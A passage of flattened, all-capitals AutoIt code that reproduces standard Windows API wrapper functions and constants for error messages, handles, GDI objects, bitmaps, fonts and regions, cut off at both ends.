$RI_MOUSE_BUTTON_2_DOWN = $RI_MOUSE_RIGHT_BUTTON_DOWN GLOBAL CONST $RI_MOUSE_BUTTON_2_UP = $RI_MOUSE_RIGHT_BUTTON_UP GLOBAL CONST $RI_MOUSE_BUTTON_3_DOWN = $RI_MOUSE_MIDDLE_BUTTON_DOWN GLOBAL CONST $RI_MOUSE_BUTTON_3_UP = $RI_MOUSE_MIDDLE_BUTTON_UP GLOBAL CONST $RI_MOUSE_BUTTON_4_DOWN = 64 GLOBAL CONST $RI_MOUSE_BUTTON_4_UP = 128 GLOBAL CONST $RI_MOUSE_BUTTON_5_DOWN = 256 GLOBAL CONST $RI_MOUSE_BUTTON_5_UP = 512 GLOBAL CONST $RI_MOUSE_WHEEL = 1024 GLOBAL CONST $RI_KEY_BREAK = 1 GLOBAL CONST $RI_KEY_E0 = 2 GLOBAL CONST $RI_KEY_E1 = 4 GLOBAL CONST $RI_KEY_MAKE = 0 #Region Global Variables and Constants GLOBAL CONST $FORMAT_MESSAGE_ALLOCATE_BUFFER = 256 GLOBAL CONST $FORMAT_MESSAGE_IGNORE_INSERTS = 512 GLOBAL CONST $FORMAT_MESSAGE_FROM_STRING = 1024 GLOBAL CONST $FORMAT_MESSAGE_FROM_HMODULE = 2048 GLOBAL CONST $FORMAT_MESSAGE_FROM_SYSTEM = 4096 GLOBAL CONST $FORMAT_MESSAGE_ARGUMENT_ARRAY = 8192 #EndRegion Global Variables and Constants FUNC _WINAPI_BEEP ($IFREQ = 500 , $IDURATION = 1000 ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "Beep" , "dword" , $IFREQ , "dword" , $IDURATION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_FORMATMESSAGE ($IFLAGS , $PSOURCE , $IMESSAGEID , $ILANGUAGEID , BYREF $PBUFFER , $ISIZE , $VARGUMENTS ) LOCAL $SBUFFERTYPE = "struct*" IF ISSTRING ($PBUFFER ) THEN $SBUFFERTYPE = "wstr" LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "dword" , "FormatMessageW" , "dword" , $IFLAGS , "struct*" , $PSOURCE , "dword" , $IMESSAGEID , "dword" , $ILANGUAGEID , $SBUFFERTYPE , $PBUFFER , "dword" , $ISIZE , "ptr" , $VARGUMENTS ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) IF $SBUFFERTYPE = "wstr" THEN $PBUFFER = $ARESULT [5 ] RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETERRORMESSAGE ($ICODE , $ILANGUAGE = 0 , CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "dword" , "FormatMessageW" , "dword" , 4096 , "ptr" , 0 , "dword" , $ICODE , "dword" , $ILANGUAGE , "wstr" , "" , "dword" , 4096 , "ptr" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , STRINGREGEXPREPLACE ($ARET [5 ] , "[" & @LF & "," & @CR & "]*\Z" , "" ) ) ENDFUNC FUNC _WINAPI_GETLASTERROR (CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , $ARESULT [0 ] ) ENDFUNC FUNC _WINAPI_GETLASTERRORMESSAGE (CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED ) LOCAL $ILASTERROR = _WINAPI_GETLASTERROR () LOCAL $TBUFFERPTR = DLLSTRUCTCREATE ("ptr" ) LOCAL $NCOUNT = _WINAPI_FORMATMESSAGE (BITOR ($FORMAT_MESSAGE_ALLOCATE_BUFFER , $FORMAT_MESSAGE_FROM_SYSTEM ) , 0 , $ILASTERROR , 0 , $TBUFFERPTR , 0 , 0 ) IF @ERROR THEN RETURN SETERROR (- @ERROR , @EXTENDED , "" ) LOCAL $STEXT = "" LOCAL $PBUFFER = DLLSTRUCTGETDATA ($TBUFFERPTR , 1 ) IF $PBUFFER THEN IF $NCOUNT > 0 THEN LOCAL $TBUFFER = DLLSTRUCTCREATE ("wchar[" & ($NCOUNT + 1 ) & "]" , $PBUFFER ) $STEXT = DLLSTRUCTGETDATA ($TBUFFER , 1 ) IF STRINGRIGHT ($STEXT , 2 ) = @CRLF THEN $STEXT = STRINGTRIMRIGHT ($STEXT , 2 ) ENDIF DLLCALL ("kernel32.dll" , "handle" , "LocalFree" , "handle" , $PBUFFER ) ENDIF RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , $STEXT ) ENDFUNC FUNC _WINAPI_MESSAGEBEEP ($ITYPE = 1 ) LOCAL $ISOUND SWITCH $ITYPE CASE 1 $ISOUND = 0 CASE 2 $ISOUND = 16 CASE 3 $ISOUND = 32 CASE 4 $ISOUND = 48 CASE 5 $ISOUND = 64 CASE ELSE $ISOUND = + 4294967295 ENDSWITCH LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "MessageBeep" , "uint" , $ISOUND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_MSGBOX ($IFLAGS , $STITLE , $STEXT ) BLOCKINPUT (0 ) MSGBOX ($IFLAGS , $STITLE , $STEXT & " " ) ENDFUNC FUNC _WINAPI_SETLASTERROR ($IERRORCODE , CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED ) DLLCALL ("kernel32.dll" , "none" , "SetLastError" , "dword" , $IERRORCODE ) RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , NULL ) ENDFUNC FUNC _WINAPI_SHOWERROR ($STEXT , $BEXIT = TRUE ) BLOCKINPUT (0 ) MSGBOX ($MB_SYSTEMMODAL , "Error" , $STEXT & " " ) IF $BEXIT THEN EXIT ENDFUNC FUNC _WINAPI_SHOWLASTERROR ($STEXT = "" , $BABORT = FALSE , $ILANGUAGE = 0 , CONST $_ICURRENTERROR = @ERROR , CONST $_ICURRENTEXTENDED = @EXTENDED ) LOCAL $SERROR LOCAL $ILASTERROR = _WINAPI_GETLASTERROR () WHILE 1 $SERROR = _WINAPI_GETERRORMESSAGE ($ILASTERROR , $ILANGUAGE ) IF @ERROR AND $ILANGUAGE THEN $ILANGUAGE = 0 ELSE EXITLOOP ENDIF WEND IF STRINGSTRIPWS ($STEXT , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STEXT &= @CRLF & @CRLF ELSE $STEXT = "" ENDIF _WINAPI_MSGBOX (BITOR (262144 , BITSHIFT (16 , + 4294967294 * (NOT $ILASTERROR ) ) ) , $ILASTERROR , $STEXT & $SERROR ) IF $ILASTERROR THEN _WINAPI_SETLASTERROR ($ILASTERROR ) IF $BABORT THEN EXIT $ILASTERROR ENDIF ENDIF RETURN SETERROR ($_ICURRENTERROR , $_ICURRENTEXTENDED , 1 ) ENDFUNC FUNC _WINAPI_SHOWMSG ($STEXT ) _WINAPI_MSGBOX ($MB_SYSTEMMODAL , "Information" , $STEXT ) ENDFUNC FUNC __COMERRORFORMATING (BYREF $OCOMERROR , $SPREFIX = @TAB ) LOCAL CONST $STR_STRIPTRAILING = 2 LOCAL $SERROR = "COM Error encountered in " & @SCRIPTNAME & " (" & $OCOMERROR.Scriptline & ") :" & @CRLF & $SPREFIX & "Number " & @TAB & "= 0x" & HEX ($OCOMERROR.Number , 8 ) & " (" & $OCOMERROR.Number & ")" & @CRLF & $SPREFIX & "WinDescription" & @TAB & "= " & STRINGSTRIPWS ($OCOMERROR.WinDescription , $STR_STRIPTRAILING ) & @CRLF & $SPREFIX & "Description " & @TAB & "= " & STRINGSTRIPWS ($OCOMERROR.Description , $STR_STRIPTRAILING ) & @CRLF & $SPREFIX & "Source " & @TAB & "= " & $OCOMERROR.Source & @CRLF & $SPREFIX & "HelpFile " & @TAB & "= " & $OCOMERROR.HelpFile & @CRLF & $SPREFIX & "HelpContext " & @TAB & "= " & $OCOMERROR.HelpContext & @CRLF & $SPREFIX & "LastDllError " & @TAB & "= " & $OCOMERROR.LastDllError & @CRLF & $SPREFIX & "Retcode " & @TAB & "= 0x" & HEX ($OCOMERROR.retcode ) RETURN $SERROR ENDFUNC #Region Global Variables and Constants GLOBAL CONST $DUPLICATE_CLOSE_SOURCE = 1 GLOBAL CONST $DUPLICATE_SAME_ACCESS = 2 GLOBAL CONST $OBJ_BITMAP = 7 GLOBAL CONST $OBJ_BRUSH = 2 GLOBAL CONST $OBJ_COLORSPACE = 14 GLOBAL CONST $OBJ_DC = 3 GLOBAL CONST $OBJ_ENHMETADC = 12 GLOBAL CONST $OBJ_ENHMETAFILE = 13 GLOBAL CONST $OBJ_EXTPEN = 11 GLOBAL CONST $OBJ_FONT = 6 GLOBAL CONST $OBJ_MEMDC = 10 GLOBAL CONST $OBJ_METADC = 4 GLOBAL CONST $OBJ_METAFILE = 9 GLOBAL CONST $OBJ_PAL = 5 GLOBAL CONST $OBJ_PEN = 1 GLOBAL CONST $OBJ_REGION = 8 GLOBAL CONST $NULL_BRUSH = 5 GLOBAL CONST $NULL_PEN = 8 GLOBAL CONST $BLACK_BRUSH = 4 GLOBAL CONST $DKGRAY_BRUSH = 3 GLOBAL CONST $DC_BRUSH = 18 GLOBAL CONST $GRAY_BRUSH = 2 GLOBAL CONST $HOLLOW_BRUSH = $NULL_BRUSH GLOBAL CONST $LTGRAY_BRUSH = 1 GLOBAL CONST $WHITE_BRUSH = 0 GLOBAL CONST $BLACK_PEN = 7 GLOBAL CONST $DC_PEN = 19 GLOBAL CONST $WHITE_PEN = 6 GLOBAL CONST $ANSI_FIXED_FONT = 11 GLOBAL CONST $ANSI_VAR_FONT = 12 GLOBAL CONST $DEVICE_DEFAULT_FONT = 14 GLOBAL CONST $DEFAULT_GUI_FONT = 17 GLOBAL CONST $OEM_FIXED_FONT = 10 GLOBAL CONST $SYSTEM_FONT = 13 GLOBAL CONST $SYSTEM_FIXED_FONT = 16 GLOBAL CONST $DEFAULT_PALETTE = 15 #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CLOSEHANDLE ($HOBJECT ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "CloseHandle" , "handle" , $HOBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DELETEOBJECT ($HOBJECT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "bool" , "DeleteObject" , "handle" , $HOBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DUPLICATEHANDLE ($HSOURCEPROCESSHANDLE , $HSOURCEHANDLE , $HTARGETPROCESSHANDLE , $IDESIREDACCESS , $IINHERITHANDLE , $IOPTIONS ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "DuplicateHandle" , "handle" , $HSOURCEPROCESSHANDLE , "handle" , $HSOURCEHANDLE , "handle" , $HTARGETPROCESSHANDLE , "handle*" , 0 , "dword" , $IDESIREDACCESS , "bool" , $IINHERITHANDLE , "dword" , $IOPTIONS ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [4 ] ENDFUNC FUNC _WINAPI_GETCURRENTOBJECT ($HDC , $ITYPE ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "handle" , "GetCurrentObject" , "handle" , $HDC , "uint" , $ITYPE ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETCURRENTPROCESS () LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "GetCurrentProcess" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETOBJECT ($HOBJECT , $ISIZE , $POBJECT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "int" , "GetObjectW" , "handle" , $HOBJECT , "int" , $ISIZE , "struct*" , $POBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETOBJECTINFOBYHANDLE ($HOBJECT ) LOCAL $TAGPUBLIC_OBJECT_BASIC_INFORMATION = "ulong Attributes;ulong GrantedAcess;ulong HandleCount;ulong PointerCount;ulong Reserved[10]" LOCAL $TPOBI = DLLSTRUCTCREATE ($TAGPUBLIC_OBJECT_BASIC_INFORMATION ) LOCAL $ARET = DLLCALL ("ntdll.dll" , "long" , "ZwQueryObject" , "handle" , $HOBJECT , "uint" , 0 , "struct*" , $TPOBI , "ulong" , DLLSTRUCTGETSIZE ($TPOBI ) , "ptr" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [4 ] FOR $I = 0 TO 3 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TPOBI , $I + 1 ) NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETOBJECTNAMEBYHANDLE ($HOBJECT ) LOCAL $TAGUNICODE_STRING = "struct;ushort Length;ushort MaximumLength;ptr Buffer;endstruct" LOCAL $TAGPUBLIC_OBJECT_TYPE_INFORMATION = "struct;" & $TAGUNICODE_STRING & ";ulong Reserved[22];endstruct" LOCAL $TPOTI = DLLSTRUCTCREATE ($TAGPUBLIC_OBJECT_TYPE_INFORMATION & ";byte[32]" ) LOCAL $ARET = DLLCALL ("ntdll.dll" , "long" , "ZwQueryObject" , "handle" , $HOBJECT , "uint" , 2 , "struct*" , $TPOTI , "ulong" , DLLSTRUCTGETSIZE ($TPOTI ) , "ulong*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) LOCAL $PDATA = DLLSTRUCTGETDATA ($TPOTI , 3 ) IF NOT $PDATA THEN RETURN SETERROR (11 , 0 , "" ) RETURN _WINAPI_GETSTRING ($PDATA ) ENDFUNC FUNC _WINAPI_GETOBJECTTYPE ($HOBJECT ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "dword" , "GetObjectType" , "handle" , $HOBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETSTDHANDLE ($ISTDHANDLE ) IF $ISTDHANDLE < 0 OR $ISTDHANDLE > 2 THEN RETURN SETERROR (2 , 0 , + 4294967295 ) LOCAL CONST $AHANDLE [3 ] = [+ 4294967286 , + 4294967285 , + 4294967284 ] LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "GetStdHandle" , "dword" , $AHANDLE [$ISTDHANDLE ] ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETSTOCKOBJECT ($IOBJECT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "GetStockObject" , "int" , $IOBJECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SELECTOBJECT ($HDC , $HGDIOBJ ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "SelectObject" , "handle" , $HDC , "handle" , $HGDIOBJ ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETHANDLEINFORMATION ($HOBJECT , $IMASK , $IFLAGS ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "SetHandleInformation" , "handle" , $HOBJECT , "dword" , $IMASK , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC #EndRegion Public Functions #Region Global Variables and Constants GLOBAL CONST $TAGBITMAP = "struct;long bmType;long bmWidth;long bmHeight;long bmWidthBytes;ushort bmPlanes;ushort bmBitsPixel;ptr bmBits;endstruct" GLOBAL CONST $TAGBITMAPV5HEADER = "struct;dword bV5Size;long bV5Width;long bV5Height;ushort bV5Planes;ushort bV5BitCount;dword bV5Compression;dword bV5SizeImage;long bV5XPelsPerMeter;long bV5YPelsPerMeter;dword bV5ClrUsed;dword bV5ClrImportant;dword bV5RedMask;dword bV5GreenMask;dword bV5BlueMask;dword bV5AlphaMask;dword bV5CSType;int bV5Endpoints[9];dword bV5GammaRed;dword bV5GammaGreen;dword bV5GammaBlue;dword bV5Intent;dword bV5ProfileData;dword bV5ProfileSize;dword bV5Reserved;endstruct" GLOBAL CONST $TAGDIBSECTION = $TAGBITMAP & ";" & $TAGBITMAPINFOHEADER & ";dword dsBitfields[3];ptr dshSection;dword dsOffset" GLOBAL CONST $TMPF_FIXED_PITCH = 1 GLOBAL CONST $TMPF_VECTOR = 2 GLOBAL CONST $TMPF_TRUETYPE = 4 GLOBAL CONST $TMPF_DEVICE = 8 GLOBAL CONST $__WINAPICONSTANT_FW_NORMAL = 400 GLOBAL CONST $__WINAPICONSTANT_DEFAULT_CHARSET = 1 GLOBAL CONST $__WINAPICONSTANT_OUT_DEFAULT_PRECIS = 0 GLOBAL CONST $__WINAPICONSTANT_CLIP_DEFAULT_PRECIS = 0 GLOBAL CONST $__WINAPICONSTANT_DEFAULT_QUALITY = 0 #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_BITBLT ($HDESTDC , $IXDEST , $IYDEST , $IWIDTH , $IHEIGHT , $HSRCDC , $IXSRC , $IYSRC , $IROP ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "bool" , "BitBlt" , "handle" , $HDESTDC , "int" , $IXDEST , "int" , $IYDEST , "int" , $IWIDTH , "int" , $IHEIGHT , "handle" , $HSRCDC , "int" , $IXSRC , "int" , $IYSRC , "dword" , $IROP ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_COMBINERGN ($HRGNDEST , $HRGNSRC1 , $HRGNSRC2 , $ICOMBINEMODE ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "int" , "CombineRgn" , "handle" , $HRGNDEST , "handle" , $HRGNSRC1 , "handle" , $HRGNSRC2 , "int" , $ICOMBINEMODE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_COPYBITMAP ($HBITMAP ) $HBITMAP = _WINAPI_COPYIMAGE ($HBITMAP , 0 , 0 , 0 , 8192 ) RETURN SETERROR (@ERROR , @EXTENDED , $HBITMAP ) ENDFUNC FUNC _WINAPI_COPYIMAGE ($HIMAGE , $ITYPE = 0 , $IXDESIREDPIXELS = 0 , $IYDESIREDPIXELS = 0 , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "CopyImage" , "handle" , $HIMAGE , "uint" , $ITYPE , "int" , $IXDESIREDPIXELS , "int" , $IYDESIREDPIXELS , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATEANDBITMAP ($HBITMAP ) LOCAL $IERROR = 0 , $HDIB = 0 $HBITMAP = _WINAPI_COPYBITMAP ($HBITMAP ) IF NOT $HBITMAP THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) DO LOCAL $ATDIB [2 ] $ATDIB [0 ] = DLLSTRUCTCREATE ($TAGDIBSECTION ) IF (NOT _WINAPI_GETOBJECT ($HBITMAP , DLLSTRUCTGETSIZE ($ATDIB [0 ] ) , $ATDIB [0 ] ) ) OR (DLLSTRUCTGETDATA ($ATDIB [0 ] , "bmBitsPixel" ) <> 32 ) OR (DLLSTRUCTGETDATA ($ATDIB [0 ] , "biCompression" ) ) THEN $IERROR = 10 EXITLOOP ENDIF $ATDIB [1 ] = DLLSTRUCTCREATE ($TAGBITMAP ) $HDIB = _WINAPI_CREATEDIB (DLLSTRUCTGETDATA ($ATDIB [0 ] , "bmWidth" ) , DLLSTRUCTGETDATA ($ATDIB [0 ] , "bmHeight" ) , 1 ) IF NOT _WINAPI_GETOBJECT ($HDIB , DLLSTRUCTGETSIZE ($ATDIB [1 ] ) , $ATDIB [1 ] ) THEN $IERROR = 11 EXITLOOP ENDIF LOCAL $ARET = DLLCALL ("user32.dll" , "lresult" , "CallWindowProc" , "ptr" , __ANDPROC () , "ptr" , 0 , "uint" , 0 , "wparam" , DLLSTRUCTGETPTR ($ATDIB [0 ] ) , "lparam" , DLLSTRUCTGETPTR ($ATDIB [1 ] ) ) IF @ERROR THEN $IERROR = @ERROR EXITLOOP ENDIF IF NOT $ARET [0 ] THEN $IERROR = 12 EXITLOOP ENDIF $IERROR = 0 UNTIL 1 _WINAPI_DELETEOBJECT ($HBITMAP ) IF $IERROR THEN IF $HDIB THEN _WINAPI_DELETEOBJECT ($HDIB ) ENDIF $HDIB = 0 ENDIF RETURN SETERROR ($IERROR , 0 , $HDIB ) ENDFUNC FUNC _WINAPI_CREATEBITMAP ($IWIDTH , $IHEIGHT , $IPLANES = 1 , $IBITSPERPEL = 1 , $PBITS = 0 ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateBitmap" , "int" , $IWIDTH , "int" , $IHEIGHT , "uint" , $IPLANES , "uint" , $IBITSPERPEL , "struct*" , $PBITS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATECOMPATIBLEBITMAP ($HDC , $IWIDTH , $IHEIGHT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateCompatibleBitmap" , "handle" , $HDC , "int" , $IWIDTH , "int" , $IHEIGHT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATEDIB ($IWIDTH , $IHEIGHT , $IBITSPERPEL = 32 , $TCOLORTABLE = 0 , $ICOLORCOUNT = 0 ) LOCAL $ARGBQ [2 ] , $ICOLORS , $TAGRGBQ SWITCH $IBITSPERPEL CASE 1 $ICOLORS = 2 CASE 4 $ICOLORS = 16 CASE 8 $ICOLORS = 256 CASE ELSE $ICOLORS = 0 ENDSWITCH IF $ICOLORS THEN IF NOT ISDLLSTRUCT ($TCOLORTABLE ) THEN SWITCH $IBITSPERPEL CASE 1 $ARGBQ [0 ] = 0 $ARGBQ [1 ] = 16777215 $TCOLORTABLE = _WINAPI_CREATEDIBCOLORTABLE ($ARGBQ ) CASE ELSE ENDSWITCH ELSE IF $ICOLORS > $ICOLORCOUNT THEN $ICOLORS = $ICOLORCOUNT ENDIF IF (NOT $ICOLORS ) OR ((4 * $ICOLORS ) > DLLSTRUCTGETSIZE ($TCOLORTABLE ) ) THEN RETURN SETERROR (20 , 0 , 0 ) ENDIF ENDIF $TAGRGBQ = ";dword aRGBQuad[" & $ICOLORS & "]" ELSE $TAGRGBQ = "" ENDIF LOCAL $TBITMAPINFO = DLLSTRUCTCREATE ($TAGBITMAPINFOHEADER & $TAGRGBQ ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biSize" , 40 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biWidth" , $IWIDTH ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biHeight" , $IHEIGHT ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biPlanes" , 1 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biBitCount" , $IBITSPERPEL ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biCompression" , 0 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biSizeImage" , 0 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biXPelsPerMeter" , 0 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biYPelsPerMeter" , 0 ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biClrUsed" , $ICOLORS ) DLLSTRUCTSETDATA ($TBITMAPINFO , "biClrImportant" , 0 ) IF $ICOLORS THEN IF ISDLLSTRUCT ($TCOLORTABLE ) THEN _WINAPI_MOVEMEMORY (DLLSTRUCTGETPTR ($TBITMAPINFO , "aRGBQuad" ) , $TCOLORTABLE , 4 * $ICOLORS ) ELSE _WINAPI_ZEROMEMORY (DLLSTRUCTGETPTR ($TBITMAPINFO , "aRGBQuad" ) , 4 * $ICOLORS ) ENDIF ENDIF LOCAL $HBITMAP = _WINAPI_CREATEDIBSECTION (0 , $TBITMAPINFO , 0 , $__G_VEXT ) IF NOT $HBITMAP THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $HBITMAP ENDFUNC FUNC _WINAPI_CREATEDIBSECTION ($HDC , $TBITMAPINFO , $IUSAGE , BYREF $PBITS , $HSECTION = 0 , $IOFFSET = 0 ) $PBITS = 0 LOCAL $ARET = DLLCALL ("gdi32.dll" , "handle" , "CreateDIBSection" , "handle" , $HDC , "struct*" , $TBITMAPINFO , "uint" , $IUSAGE , "ptr*" , 0 , "handle" , $HSECTION , "dword" , $IOFFSET ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) $PBITS = $ARET [4 ] RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATEDIBCOLORTABLE (CONST BYREF $ACOLORTABLE , $ISTART = 0 , $IEND = + 4294967295 ) IF __CHECKERRORARRAYBOUNDS ($ACOLORTABLE , $ISTART , $IEND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $TCOLORTABLE = DLLSTRUCTCREATE ("dword[" & ($IEND - $ISTART + 1 ) & "]" ) LOCAL $ICOUNT = 1 FOR $I = $ISTART TO $IEND DLLSTRUCTSETDATA ($TCOLORTABLE , 1 , _WINAPI_SWITCHCOLOR (__RGB ($ACOLORTABLE [$I ] ) ) , $ICOUNT ) $ICOUNT += 1 NEXT RETURN $TCOLORTABLE ENDFUNC FUNC _WINAPI_CREATEFONT ($IHEIGHT , $IWIDTH , $IESCAPE = 0 , $IORIENTN = 0 , $IWEIGHT = $__WINAPICONSTANT_FW_NORMAL , $BITALIC = FALSE , $BUNDERLINE = FALSE , $BSTRIKEOUT = FALSE , $ICHARSET = $__WINAPICONSTANT_DEFAULT_CHARSET , $IOUTPUTPREC = $__WINAPICONSTANT_OUT_DEFAULT_PRECIS , $ICLIPPREC = $__WINAPICONSTANT_CLIP_DEFAULT_PRECIS , $IQUALITY = $__WINAPICONSTANT_DEFAULT_QUALITY , $IPITCH = 0 , $SFACE = "Arial" ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateFontW" , "int" , $IHEIGHT , "int" , $IWIDTH , "int" , $IESCAPE , "int" , $IORIENTN , "int" , $IWEIGHT , "dword" , $BITALIC , "dword" , $BUNDERLINE , "dword" , $BSTRIKEOUT , "dword" , $ICHARSET , "dword" , $IOUTPUTPREC , "dword" , $ICLIPPREC , "dword" , $IQUALITY , "dword" , $IPITCH , "wstr" , $SFACE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATEFONTINDIRECT ($TLOGFONT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateFontIndirectW" , "struct*" , $TLOGFONT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATERECTRGN ($ILEFTRECT , $ITOPRECT , $IRIGHTRECT , $IBOTTOMRECT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateRectRgn" , "int" , $ILEFTRECT , "int" , $ITOPRECT , "int" , $IRIGHTRECT , "int" , $IBOTTOMRECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATEROUNDRECTRGN ($ILEFTRECT , $ITOPRECT , $IRIGHTRECT , $IBOTTOMRECT , $IWIDTHELLIPSE , $IHEIGHTELLIPSE ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateRoundRectRgn" , "int" , $ILEFTRECT , "int" , $ITOPRECT , "int" , $IRIGHTRECT , "int" , $IBOTTOMRECT , "int" , $IWIDTHELLIPSE , "int" , $IHEIGHTELLIPSE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATESOLIDBRUSH ($ICOLOR ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateSolidBrush" , "INT" , $ICOLOR ) IF @ERROR THEN RETURN SETERROR (@ERROR 